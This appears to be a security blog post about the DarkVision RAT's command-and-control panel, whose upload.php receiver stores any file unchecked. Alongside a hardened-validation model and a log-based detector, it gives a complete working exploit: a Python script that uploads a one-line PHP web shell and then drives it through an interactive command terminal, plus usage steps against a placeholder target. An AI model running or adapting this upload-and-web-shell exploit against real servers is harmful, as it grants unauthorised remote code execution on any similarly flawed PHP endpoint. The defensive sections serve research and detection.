DarkVision.cpp

DarkVision RAT Analysis

In this technical analysis, we'll explore the DarkVision RAT malware, focusing on a file upload vulnerability in the upload.php endpoint that its password recovery module reports to, and demonstrating how that flaw yields remote code execution on the server hosting the panel.

Understanding DarkVision RAT

DarkVision RAT is a Remote Access Trojan written in C/C++ and assembly. One of its components is an automatic password recovery module, which exfiltrates the credentials it harvests by POSTing them to a simple upload.php script on the attacker's server.

Core Components

  • Password Recovery Module
  • File Upload Mechanism
  • Command & Control Infrastructure

Vulnerability Analysis

The vulnerability lies in upload.php, the server-side receiver for the password recovery module. The script accepts any uploaded file without checking its name, extension or content, and stores it under a web-accessible directory whose path is built from the request's own hwid and logfoldername fields. Because the stored file is served by the same web server, an attacker can upload a .php file and then request it, and the server executes the attacker-supplied PHP code.

Key Parameters

  • hwid: Hardware ID of the infected machine; used as the first directory level under uploads/
  • logfoldername: Name of the directory the uploaded file is stored in, beneath the hwid directory
  • uploaded_file: The multipart file field carrying the file being uploaded; its original filename is kept on the server
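The page does not reproduce the upload.php source, so the following Python model, added here and not taken from the RAT panel or from the original post, shows the unvalidated store path beside the checks a hardened receiver would need: a safe alphabet for the two directory-name fields, a bare filename, an extension allowlist, a content check for PHP open tags, and a final containment check on the resolved path. The upload root and the allowed extensions (plain-text credential logs) are assumptions.

```python
import posixpath
import re

# Assumed web-accessible root that upload.php writes into (not stated on the page).
UPLOAD_ROOT = "/var/www/html/uploads"
# hwid and logfoldername become directory names, so restrict them to a safe alphabet.
SAFE_SEGMENT = re.compile(r"^[A-Za-z0-9_-]{1,64}$")
# Assumed: the password recovery module only ever uploads plain-text logs.
ALLOWED_EXT = {".txt", ".log"}


def vulnerable_store_path(hwid, logfoldername, filename):
    """What the unvalidated receiver does: trust every field verbatim."""
    return posixpath.join(UPLOAD_ROOT, hwid, logfoldername, filename)


def hardened_check(hwid, logfoldername, filename, content):
    """Return (accepted, reason, stored_path); stored_path is None on rejection."""
    for label, value in (("hwid", hwid), ("logfoldername", logfoldername)):
        if not SAFE_SEGMENT.fullmatch(value):
            return False, f"{label} is not a safe directory name", None

    # Reject anything carrying a directory component or a special name.
    if filename != posixpath.basename(filename) or filename in ("", ".", ".."):
        return False, "filename must be a bare file name", None

    ext = posixpath.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXT:
        return False, f"extension {ext or '(none)'} is not allowed", None

    # Even with an allowed name, refuse bodies that look like PHP source
    # ("<?" covers "<?php" and "<?=").
    if b"<?" in content:
        return False, "content contains a PHP open tag", None

    # Defence in depth: the resolved path must still sit inside UPLOAD_ROOT.
    stored = posixpath.normpath(posixpath.join(UPLOAD_ROOT, hwid, logfoldername, filename))
    if not stored.startswith(UPLOAD_ROOT + "/"):
        return False, "resolved path escapes the upload root", None
    return True, "ok", stored


if __name__ == "__main__":
    web_shell = b"<?php system($_GET['cmd']); ?>"
    print("vulnerable:", vulnerable_store_path("Ab12Cd34", "Xy9z", "shell.php"))
    for case in (
        ("Ab12Cd34", "Xy9z", "passwords.txt", b"user:pass"),
        ("Ab12Cd34", "Xy9z", "shell.php", web_shell),
        ("../../..", "Xy9z", "passwords.txt", b"user:pass"),
        ("Ab12Cd34", "Xy9z", "notes.txt", web_shell),
    ):
        accepted, reason, path = hardened_check(*case)
        print("hardened:", case[2], "->", "ACCEPT" if accepted else "REJECT", reason, path)
```

The allowlist on hwid and logfoldername already rules out traversal, so the final normpath check is redundant by construction; it stays because it protects the handler if someone later relaxes the segment regex.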

Exploitation Tool

I've developed a Python script that exploits this vulnerability to gain remote code execution on the server hosting the panel. It uploads a PHP web shell through upload.php, derives the URL the shell was stored at, and then provides an interactive terminal that sends commands to it.

Exploitation Script

import os
import random
import string
from urllib.parse import urljoin

import requests


def generate_random_string(length=8):
    # hwid and logfoldername become directory names on the server, so random
    # values keep our upload in a folder of its own rather than a victim's.
    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))


def upload_shell(url, hwid, logfoldername, shell_content, timeout=10):
    # Send the same multipart fields the password recovery module uses;
    # upload.php stores the file under uploads/<hwid>/<logfoldername>/.
    shell_file_name = "shell.php"
    data = {
        "hwid": hwid,
        "logfoldername": logfoldername,
    }
    # Send the shell from memory instead of writing it to disk and leaking the handle.
    files = {
        "uploaded_file": (shell_file_name, shell_content.encode(), "application/x-php"),
    }

    response = requests.post(url, data=data, files=files, timeout=timeout)
    return response

Interactive Terminal Implementation

def fancy_terminal(shell_url, timeout=15):
    os.system("clear")
    print("╔═════════════════════════════════════════════════════════════╗")
    print("║               DarkVision RAT Vuln - Terminal                ║")
    print("╚═════════════════════════════════════════════════════════════╝")

    while True:
        try:
            cmd = input("darkvision-vuln@remote $ ").strip()
            if cmd.lower() in ["exit", "quit"]:
                break

            # The web shell reads the command from the cmd query parameter.
            response = requests.get(shell_url, params={"cmd": cmd}, timeout=timeout)
            if response.status_code == 200:
                output = response.text.strip()
                if output:
                    print(output)
                else:
                    print("[!] Command executed successfully, but no output was returned.")
            else:
                print(f"[!] Shell returned HTTP {response.status_code}")
        except requests.RequestException as exc:
            print(f"[!] Request failed: {exc}")
        except (KeyboardInterrupt, EOFError):
            print("\nSession interrupted. Goodbye!")
            break


if __name__ == "__main__":
    upload_url = input("[?] Enter the URL of upload.php: ").strip()
    hwid = generate_random_string()
    logfoldername = generate_random_string()
    # Minimal web shell matching the cmd parameter the terminal sends.
    shell = "<?php system($_GET['cmd']); ?>"
    resp = upload_shell(upload_url, hwid, logfoldername, shell)
    if resp.status_code != 200:
        raise SystemExit(f"[-] Upload failed with HTTP {resp.status_code}")
    # upload.php stores files under uploads/<hwid>/<logfoldername>/ next to itself.
    shell_url = urljoin(upload_url, f"uploads/{hwid}/{logfoldername}/shell.php")
    print(f"[+] Shell URL: {shell_url}")
    fancy_terminal(shell_url)

Detection

Indicators

  • upload.php scripts on unknown servers, especially ones that store uploads under uploads/<hwid>/<folder>/.
  • HTTP POST requests to upload.php whose multipart body contains the fields hwid and logfoldername.
  • GET requests with a cmd query parameter to .php files under uploads/, which indicate an uploaded web shell being driven.
  • The literal string upload.php in an unknown binary or in its network traffic.
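To make these indicators actionable, here is an added Python example (mine, not from the original page) that runs them over a handful of constructed proxy/WAF-style events and correlates hits per source address. The event shape, hostnames and addresses are assumptions; the rules follow the page's own upload.php field names and the uploads/<hwid>/<folder>/shell.php layout.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample events in the shape a proxy or WAF might log (not real traffic).
EVENTS = [
    {"src": "10.0.0.5", "method": "POST", "url": "http://c2.example/upload.php",
     "form_fields": ["hwid", "logfoldername"], "upload_name": "passwords.txt"},
    {"src": "10.0.0.9", "method": "POST", "url": "http://c2.example/upload.php",
     "form_fields": ["hwid", "logfoldername"], "upload_name": "shell.php"},
    {"src": "10.0.0.9", "method": "GET",
     "url": "http://c2.example/uploads/Ab12Cd34/Xy9z/shell.php?cmd=whoami"},
    {"src": "10.0.0.7", "method": "GET", "url": "http://c2.example/index.php?cmd=1"},
    {"src": "10.0.0.8", "method": "POST", "url": "http://cdn.example/upload.php",
     "form_fields": ["file"], "upload_name": "avatar.png"},
]

# A .php-family file two directory levels below uploads/, as the exploit lays it out.
WEBSHELL_PATH = re.compile(r"^/uploads/[^/]+/[^/]+/[^/]+\.ph(p\d?|tml|ar)$", re.I)
PHP_EXT = re.compile(r"\.ph(p\d?|tml|ar)$", re.I)
RAT_FIELDS = {"hwid", "logfoldername"}


def classify(event):
    """Return the indicator names that fire on a single event, in rule order."""
    hits = []
    parts = urlsplit(event["url"])
    path, query = parts.path, parse_qs(parts.query)
    fields = set(event.get("form_fields", []))

    if event["method"] == "POST" and path.endswith("/upload.php"):
        # The RAT client's exfiltration POST and the exploit both send these fields.
        if RAT_FIELDS <= fields:
            hits.append("darkvision_exfil_post")
        # A legitimate credential log is not a PHP file.
        if PHP_EXT.search(event.get("upload_name", "")):
            hits.append("php_file_uploaded")

    # Driving the uploaded shell: GET to uploads/<a>/<b>/x.php with cmd=.
    if event["method"] == "GET" and WEBSHELL_PATH.match(path) and "cmd" in query:
        hits.append("webshell_command")
    return hits


def scan(events):
    """Map each source address to the set of indicators it triggered."""
    report = {}
    for event in events:
        for hit in classify(event):
            report.setdefault(event["src"], set()).add(hit)
    return report


def likely_exploitation(report):
    """Sources that both uploaded a PHP file and then issued a cmd= request."""
    return sorted(src for src, hits in report.items()
                  if {"php_file_uploaded", "webshell_command"} <= hits)


if __name__ == "__main__":
    report = scan(EVENTS)
    for src, hits in sorted(report.items()):
        print(src, sorted(hits))
    print("likely exploitation of the panel:", likely_exploitation(report))
```

Correlating by source separates the two things that produce POSTs to upload.php: an infected host beaconing its credential log fires only darkvision_exfil_post, while an operator exploiting the panel fires php_file_uploaded and then webshell_command from the same address.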

Usage Guide

Running the Exploit

# Start the exploit
python darkvision_vuln.py

# Enter target URL
[?] Enter the URL of upload.php: http://target.com/upload.php

# Use the generated shell URL
[+] Shell URL: http://target.com/uploads/[random_hwid]/[random_folder]/shell.php

Note: This analysis is for educational and research purposes only. Always obtain proper authorization before testing security tools.

Additional Resources

  • Detailed Technical Analysis: Zscaler Research
  • Source Code: Available in the research repository